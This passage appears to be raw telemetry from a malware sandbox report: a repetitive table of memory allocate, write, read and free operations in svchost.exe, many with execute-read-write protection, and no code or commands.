| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3f8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 14 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001e, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a400, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a408, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 9 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20019, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a410, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a418, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a420, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e008, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678168 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 25 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc18, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2677704 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc78, free_type = MEM_RELEASE, size = 2677864 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20029, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dda8, free_type = MEM_RELEASE, size = 2678176 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a078, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 24 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20028, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a080, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 20 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20024, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a088, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 19 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20023, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a090, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a098, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 24 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20028, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0a0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 10 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001a, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0a8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0b0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 18 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20022, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0b8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0c0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 25 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20029, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0c8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0d0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 23 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20027, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0d8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
